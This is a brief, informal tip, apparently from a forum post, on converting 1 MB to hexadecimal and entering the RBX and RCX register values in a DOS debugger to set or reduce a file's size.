1 MB = 1048576 bytes

convert 1048576 bytes into HEX number For That Simply Use Calculator ...!!

ANS : 100000 (HEX value)

Last For 0000 for CX register....

so for RCX enter 0000

& for RBX enter 0010 (first four value of HEX)

You Done It...!!

Also Using This Method You Can Decrease File Value...!!!

""  Facing Problem In .exe , .docx ....etc files....!!!  """